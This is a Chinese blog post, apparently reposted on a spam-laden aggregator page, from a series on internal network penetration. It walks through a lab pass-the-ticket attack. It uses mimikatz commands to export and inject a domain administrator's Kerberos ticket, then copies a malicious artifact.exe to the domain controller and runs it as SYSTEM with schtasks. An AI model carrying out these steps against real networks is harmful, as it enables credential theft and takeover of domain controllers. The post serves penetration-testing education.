当前位置: 首页 > news >正文 宜宾微信网站建设公众号 wordpress 结合 news 2025/10/29 3:14:16 宜宾微信网站建设,公众号 wordpress 结合,网站建设 管理,珠海做网站优化系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基础知识-域中的权限划分和基本思想 内网渗透(七)之基础知识-企业常见安全域划分和结构 内网渗透(八)之基础知识-企业域中计算机分类和专业名 系列文章第二章节之内网信息收集篇 内网渗透(九)之内网信息收集-手动本地信息收集 内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息 内网渗透(十一)之内网信息收集-内网IP扫描和发现 内网渗透(十二)之内网信息收集-内网端口扫描和发现 内网渗透(十三)之内网信息收集-收集域环境中的基本信息 内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息 内网渗透(十五)之内网信息收集-域环境中定位域管理员 内网渗透(十六)之内网信息收集-powershell基础知识 内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位 系列文章第三章节之Windows协议认证和密码抓取篇 内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希 内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议) 内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议) 内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式 内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式 内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码 内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash 内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取 内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具 内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解 内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施 系列文章第四章节之横向移动篇 内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动 内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动 内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动 内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动 内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动 内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动 内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动 内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动 内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击 注阅读本编文章前请先阅读系列文章以免造成看不懂的情况 pass the ticket 票据传递攻击(PTT)横向攻击 票据传递介绍 要想使用mimikatz的哈希传递功能,必须具有本地管理员权限。 mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法 例如票据传递( PassThe Ticket,PTT) 票据传递是基于kerberos认证的一种攻击方式常用来做后渗透权限维持。 黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。 白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。 票据传递攻击一般分为两种 1、自己制作票据 2、传递内存中的票据 实验复现 实验环境 机器名登录用户IPWindows server 2012域控administrator域管理员192.168.41.10windows server 2012-2域内主机administrator本地管理员192.168.41.15 首先我们通过木马或者钓鱼等各种方法拿下windows server 2012-2主机的权限 然后我们导出机器内存中的票据 mimikatz sekurlsa::tickets /export执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。 我们很幸运的导出了一张域管理员用户的高权限票据 清除内存中的票据 shell klist purge mimikatz kerberos::purge //两个都是清除票据将高权限的票据文件注入内存 mimikatz kerberos::ptt [0;24a93]-2-0-40e10000-Administratorkrbtgt-HACK.COM.kirbi查看票据 shell klist mimikatz kerberos::tgt //两个都是查看票据访问机器 dir \\dc.hack.com\C$现在由于我们有了域管理员权限的高权限票据导致可以让我们访问域控了接下来就是利用IPC配合计划任务上线域控了 这个artifact.exe就是我们要拷贝的恶意程序他被我们放置在Windows 2012-2主机上 拷贝恶意程序到域控上 copy artifact.exe \\dc.hack.com\C$schtasks命令创建计划任务 schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /fschtasks命令执行计划任务 schtasks /run /s IP地址 /i /tn 计划任务名目标机器域控成功上线 文章转载自: http://www.morning.kjmcq.cn.gov.cn.kjmcq.cn http://www.morning.fprll.cn.gov.cn.fprll.cn http://www.morning.nfqyk.cn.gov.cn.nfqyk.cn http://www.morning.jftl.cn.gov.cn.jftl.cn http://www.morning.pypbz.cn.gov.cn.pypbz.cn http://www.morning.hwpcm.cn.gov.cn.hwpcm.cn http://www.morning.rswtz.cn.gov.cn.rswtz.cn http://www.morning.jyyw.cn.gov.cn.jyyw.cn http://www.morning.rbsxf.cn.gov.cn.rbsxf.cn http://www.morning.ctfwl.cn.gov.cn.ctfwl.cn http://www.morning.ghwdm.cn.gov.cn.ghwdm.cn http://www.morning.wjlnz.cn.gov.cn.wjlnz.cn http://www.morning.mgnrc.cn.gov.cn.mgnrc.cn http://www.morning.zgpgl.cn.gov.cn.zgpgl.cn http://www.morning.lbcfj.cn.gov.cn.lbcfj.cn http://www.morning.thpns.cn.gov.cn.thpns.cn http://www.morning.tfcwj.cn.gov.cn.tfcwj.cn http://www.morning.ksjnl.cn.gov.cn.ksjnl.cn http://www.morning.xrnh.cn.gov.cn.xrnh.cn http://www.morning.gblrn.cn.gov.cn.gblrn.cn http://www.morning.schwr.cn.gov.cn.schwr.cn http://www.morning.xdhcr.cn.gov.cn.xdhcr.cn http://www.morning.ptqbt.cn.gov.cn.ptqbt.cn http://www.morning.wfmqc.cn.gov.cn.wfmqc.cn http://www.morning.dtcsp.cn.gov.cn.dtcsp.cn http://www.morning.pqxjq.cn.gov.cn.pqxjq.cn http://www.morning.gycyt.cn.gov.cn.gycyt.cn http://www.morning.rgnp.cn.gov.cn.rgnp.cn http://www.morning.kfmlf.cn.gov.cn.kfmlf.cn http://www.morning.pzjrm.cn.gov.cn.pzjrm.cn http://www.morning.4q9h.cn.gov.cn.4q9h.cn http://www.morning.dmwck.cn.gov.cn.dmwck.cn http://www.morning.mllmm.cn.gov.cn.mllmm.cn http://www.morning.sfdsn.cn.gov.cn.sfdsn.cn http://www.morning.qzqfq.cn.gov.cn.qzqfq.cn http://www.morning.yghlr.cn.gov.cn.yghlr.cn http://www.morning.itvsee.com.gov.cn.itvsee.com http://www.morning.ryglh.cn.gov.cn.ryglh.cn http://www.morning.yjdql.cn.gov.cn.yjdql.cn http://www.morning.zxwqt.cn.gov.cn.zxwqt.cn http://www.morning.rzbcz.cn.gov.cn.rzbcz.cn http://www.morning.fswml.cn.gov.cn.fswml.cn http://www.morning.lhptg.cn.gov.cn.lhptg.cn http://www.morning.qwqzk.cn.gov.cn.qwqzk.cn http://www.morning.mzjbz.cn.gov.cn.mzjbz.cn http://www.morning.blqgc.cn.gov.cn.blqgc.cn http://www.morning.hrpbq.cn.gov.cn.hrpbq.cn http://www.morning.hxlch.cn.gov.cn.hxlch.cn http://www.morning.dnqliv.cn.gov.cn.dnqliv.cn http://www.morning.dyrzm.cn.gov.cn.dyrzm.cn http://www.morning.sgpnz.cn.gov.cn.sgpnz.cn http://www.morning.gfmpk.cn.gov.cn.gfmpk.cn http://www.morning.bbtn.cn.gov.cn.bbtn.cn http://www.morning.tbqdm.cn.gov.cn.tbqdm.cn http://www.morning.cmrfl.cn.gov.cn.cmrfl.cn http://www.morning.nmfwm.cn.gov.cn.nmfwm.cn http://www.morning.krqhw.cn.gov.cn.krqhw.cn http://www.morning.xdnhw.cn.gov.cn.xdnhw.cn http://www.morning.ttcmdsg.cn.gov.cn.ttcmdsg.cn http://www.morning.mwzt.cn.gov.cn.mwzt.cn http://www.morning.gfmpk.cn.gov.cn.gfmpk.cn http://www.morning.bxch.cn.gov.cn.bxch.cn http://www.morning.hlnrj.cn.gov.cn.hlnrj.cn http://www.morning.wyrsn.cn.gov.cn.wyrsn.cn http://www.morning.tcylt.cn.gov.cn.tcylt.cn http://www.morning.snmsq.cn.gov.cn.snmsq.cn http://www.morning.jrlgz.cn.gov.cn.jrlgz.cn http://www.morning.cgstn.cn.gov.cn.cgstn.cn http://www.morning.tkcct.cn.gov.cn.tkcct.cn http://www.morning.tpxgm.cn.gov.cn.tpxgm.cn http://www.morning.fxzlg.cn.gov.cn.fxzlg.cn http://www.morning.pwhjr.cn.gov.cn.pwhjr.cn http://www.morning.ngkgy.cn.gov.cn.ngkgy.cn http://www.morning.tbqdm.cn.gov.cn.tbqdm.cn http://www.morning.lqgtx.cn.gov.cn.lqgtx.cn http://www.morning.xbckm.cn.gov.cn.xbckm.cn http://www.morning.ltspm.cn.gov.cn.ltspm.cn http://www.morning.kqqk.cn.gov.cn.kqqk.cn http://www.morning.cryb.cn.gov.cn.cryb.cn http://www.morning.homayy.com.gov.cn.homayy.com 查看全文 http://www.tj-hxxt.cn/news/219412.html 相关文章: 网站建设系统怎么样做网站的资金来源 电影网站如何做建设网站前的市场分析包括 tp5企业网站开发实例郑州头条最新消息 长沙服装网站建设钓鱼网站二维码制作软件 山东省建设工程质量监督网站用微信怎么做商城网站 青岛餐饮加盟网站建设如何汇报网站建设 集团制度建设网站可以做动画的网站有哪些 响应式网站设计欣赏策划专业网站 自己做的网站怎么上网上海 企业 网站建设 帮助传销做网站会不会判刑wordpress 判断页面 做任务能赚钱的网站有哪些网络销售公司 申请网站建设经费99个创意营销方案 河北邢台wap网站建设mvc网站入口asp 江苏省建设注册中心网站首页知名网站建设公司电话 网站建设管理情况汇报wordpress最好的图片压缩 成都网站建设新闻系部网站建设需求分析运行需求 上海手机网站海洋网站建设网络 网站后台管理界面代码世界500强中国企业 企业网站设计话术wordpress婚庆模板下载 橙色网站欣赏如何增加网站权重 软装设计网站有哪些wordpress首页html在哪里修改 网站设计企业wordpress front profile 高端求职网站排名设计做网站哪家公司好 信息发布网站建设wordpress访问速度慢 网站建设速度如何解决简约好看的网站模板 电子商务网站建设与维护致谢词公众号开发是什么 网站推广方案怎么写金方时代网站建设 网站制作及排名优化网站建设公司做销售前景好不好 不会编程 做网站新零售商城系统开发 大学生二手书网站开发需求网址大全123下载apk